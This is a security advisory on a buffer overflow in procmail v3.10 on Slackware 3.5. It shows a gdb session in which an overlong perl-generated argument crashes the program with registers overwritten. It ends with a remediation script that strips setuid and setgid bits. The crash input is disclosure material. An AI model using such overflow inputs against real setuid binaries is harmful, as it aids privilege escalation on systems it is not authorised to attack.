COMMAND

    procmail

SYSTEMS AFFECTED

    Linux Slackware 3.5 (others?)

PROBLEM

    M.C.Mar posted the following.  He found a buffer overflow in procmail.

        woozle:~> gdb ./procmail
        [...]
        (gdb)  r `perl -e 'print "A" x 5000'`
        Starting program: /home/emsi/./procmail `perl -e 'print "A" x 5000'`
        [You need to type ^D here!!!]

        procmail: Couldn't create "/var/spool/mail/emsi"
        (no debugging symbols found)...(no debugging symbols found)...
        Program received signal SIGSEGV, Segmentation fault.
        0x4008a107 in malloc ()

    Interesting, isn't it? But look at this:

        (gdb)  r `perl -e 'print "A" x 7000'`
        [...]
        Starting program: /home/emsi/./procmail `perl -e 'print "A" x 7000'`
        procmail: Couldn't create "/var/spool/mail/emsi"

        Program received signal SIGSEGV, Segmentation fault.
        0x4007dfa3 in strncmp ()

    But this time, there is something more interesting:

        (gdb) x/i 0x4007dfa3
        0x4007dfa3 <strncmp+19>:        lodsb  %ds:(%esi),%al
        (gdb) info registers
        eax            0x41414141       1094795585
        esi            0x41414141       1094795585
        ds             0x2b     43

    The procmail in question is procmail v3.10 1994/10/31, which comes
    with Slackware 3.5.

SOLUTION

    Nothing yet.  To be sure, remove the suid bit from procmail and
    watch out for updates.
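
    The mitigation above as a script (an added example, not part of the
    original advisory): it reports each procmail binary that carries a
    privileged mode bit, clears the bit and re-checks the result.  It
    also clears setgid, which goes beyond the advisory's "remove suid";
    the function names are hypothetical and the directories to check
    are supplied by the caller.

```shell
#!/bin/sh
# Added example: clear setuid/setgid on procmail until a fixed version ships.
# Function names are hypothetical; directories are supplied by the caller.

# Exit 0 if FILE is a regular file with the setuid or setgid bit set.
has_priv_bits() {
    [ -f "$1" ] && { [ -u "$1" ] || [ -g "$1" ]; }
}

# Clear both bits on FILE, then re-check instead of trusting chmod's status.
# Exit 0 if FILE ends up unprivileged, 1 otherwise.
strip_priv_bits() {
    f=$1
    if [ ! -f "$f" ]; then
        echo "skip:   $f (not a regular file)"
        return 1
    fi
    if ! has_priv_bits "$f"; then
        echo "ok:     $f (no setuid/setgid bit)"
        return 0
    fi
    ls -l "$f"                      # show the mode before changing it
    chmod u-s,g-s "$f" || true      # outcome is verified on the next line
    if has_priv_bits "$f"; then
        echo "FAILED: $f is still setuid/setgid (need root?)"
        return 1
    fi
    echo "fixed:  $f"
}

# Check DIR/procmail for every DIR given; exit 1 if any copy stays privileged.
harden_procmail() {
    rc=0
    for d in "$@"; do
        [ -e "$d/procmail" ] || continue
        strip_priv_bits "$d/procmail" || rc=1
    done
    return $rc
}

# Example: sh harden.sh /usr/bin /usr/local/bin
if [ "$#" -gt 0 ]; then
    harden_procmail "$@"
fi
```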